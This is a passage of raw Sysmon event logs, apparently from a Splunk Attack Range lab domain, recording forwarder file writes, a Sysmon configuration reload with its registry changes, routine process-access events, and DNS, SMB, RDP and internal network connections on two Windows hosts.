Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=902BA4932F1CA3B5CCD57401C91095A6,SHA256=3E442689CB58B1B22C89C152B385FC7CAAD931B957B5B96FACC2DF784090A2AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:56.169{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88661B3ADED811E464457BCC48E02AA7,SHA256=111AE6A1E0A97A692FC81DEF234C238DFD27025C4F35EA3EB6C9B7F5AA550CAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808215Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:57.384{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1523338FA67C336D7E923B93F6C430FD,SHA256=A6E25356ECB90C8DE93496A9D6EE5B7F0C410AFEBBD5E1E91C2FB8E7422530C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:49.761{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51078-false10.0.1.12-8000- 23542300x80000000000000001050250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:57.186{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C98B20D2712CFF6F3CCF035788A8805,SHA256=0FB6749D65DCE0F2FBBF25F5F40111C95BA2B17CC2C4D3F4ECE51527C49F526D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808214Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:55.376{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57311-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:57.068{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808216Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:58.385{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6E241601727F6F93FDCEBB77DA71734,SHA256=1143447974927DA6639701BF6BE61E1F981116612927B82BCB50C876EFD78D20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:58.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63FFA5FB15B82B4DFF16CD4244339763,SHA256=E0E9905BAF8A0635E35E3B0C305992E3ABEDDC455224AC1C67B59102DEE271DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808221Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.682{0C1E0330-048F-60E8-0B00-00000000D001}628832C:\Windows\system32\lsass.exe{0C1E0330-048D-60E8-0100-00000000D001}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x8000000000000000808220Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.401{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E85BCA7A01D079693040005D79717D0,SHA256=ED4367FC8333039F1216DF716EB523DCC0E200EE5B05BCCD997918EE00693E63,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001050274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.535{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigHashSHA256=B0C36ACDF22162AD79D07D67E63140DF7514E548DA320BC04E293C986A9BC194 13241300x80000000000000001050273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.535{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigFileC:\Program Files\ansible\AttackRangeSysmon.xml 16341600x80000000000000001050272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local2021-07-12 07:55:59.535C:\Program Files\ansible\AttackRangeSysmon.xmlSHA256=B0C36ACDF22162AD79D07D67E63140DF7514E548DA320BC04E293C986A9BC194 13241300x80000000000000001050271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.535{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\RulesBinary Data 13241300x80000000000000001050270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookupBinary Data 13241300x80000000000000001050269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocationBinary Data 13241300x80000000000000001050268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithmDWORD (0x8000000e) 13241300x80000000000000001050267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\OptionsDWORD (0x00000007) 12241200x80000000000000001050266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Rules 12241200x80000000000000001050265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookup 12241200x80000000000000001050264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocation 12241200x80000000000000001050263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithm 12241200x80000000000000001050262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:55:59.504{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Options 10341000x80000000000000001050261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.419{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.419{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.419{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.422{466BC892-F58F-60EB-5B7D-00000000CF01}6996C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c "C:\Program Files\ansible\AttackRangeSysmon.xml"C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x80000000000000001050253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:59.235{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=750EA789080C84D37C747409EF8118A5,SHA256=288FC82E1B5E02CA30B99220B958A8E5D603064B6BCB59D7999370C2E5B5168E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808219Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:57.931{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-15635-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808218Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.072{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4983F6A885320869D494F5F2E33196BC,SHA256=51628AA4F2E356C69B955E88424F428DCED52C1B9EA0E378D64668C09BFF1E1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808217Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.072{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=289C932C0685C56F3E411A901D46CEE6,SHA256=4D9983F4CE10AA119E42B1C7CC8C27C18785B1D5692CA9AD485C3B2877F2A788,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808223Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:00.416{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE483584B5721D6A257B590BBBA3C599,SHA256=6D3956DF78685A603F59824172E6D2CB8F3E1AA0C44560FEF95307F762C5BC6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:00.620{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\aborted-session-pingMD5=461650CCA838D01F5DE4020E377CCDE0,SHA256=3952425011BEABBEA01B291599305E155B3B569E6BBCED8CD7CA34EE8B13588E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:00.451{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A114D5F4DC5A6ADD829A28B16DD95646,SHA256=410E7A98D69D140B6CDF9E576853EE35DBB6C5E00590C7FE253C7C327053BFD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:00.451{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF16F01D00B9A09AF65B2E385B0CF54C,SHA256=06CA2F96AFDD9733DA427187B32F5000CA299D4206D4857366C1FBF43A1F1198,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:00.236{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74FBE259AE0D9C8C66688D0176F67F7D,SHA256=524EF3DCBC827970F76F4FBC867EAB1E871F19021F7309C528807DE73CC72EAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808222Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:58.224{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57312-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000808226Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:01.432{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1C4FE22B978E797AA298128CC2A943E,SHA256=F0D999643196B8A2014141051EB14E528F455BCC022F2F2E1F0C76823FCAE3CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.221{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal52194- 23542300x80000000000000001050279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:01.250{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33A0BF99A90609E5558F571828B88A28,SHA256=429B571DDE90493C91118AA9A56BD312C8CEF109F0B8856D119739EED106D236,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808225Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.832{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse10.0.1.15win-host-623.attackrange.local52194-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal53domain 354300x8000000000000000808224Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.831{0C1E0330-0490-60E8-1400-00000000D001}740C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:c810:752:c94:ffff-52194-truea00:10e:0:0:0:0:0:0ip-10-0-1-14.eu-central-1.compute.internal53domain 23542300x8000000000000000808229Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:02.432{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0EE67369E23CFAD2A4831BD6AE92EC0,SHA256=516270A378E50D03ED82062E28D1AF26DEEF289056D51B4DE4E11F2E971EAD33,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.223{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57313-false10.0.1.14win-dc-890.attackrange.local445microsoft-ds 23542300x80000000000000001050281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:02.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAD5916B4F3E5BD3B5A1D7AEFC521272,SHA256=C6A8CA02DF93F05F5767163EC963E99F626D87F27C5CF2F6E529446C2FD0E92E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808228Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:01.283{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57314-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000808227Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:59.833{0C1E0330-048D-60E8-0100-00000000D001}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57313-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal445microsoft-ds 23542300x8000000000000000808230Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:03.432{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE3921FA901C3771DDEE6A2EC3BC822B,SHA256=B4D3F784706980BF471D461D96664F82E5DB259A93A85739F79CC7C9FB5ACC3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:55.741{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51080-false10.0.1.12-8000- 23542300x80000000000000001050283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:03.269{466BC892-02CE-60E8-7600-00000000CF01}3400NT 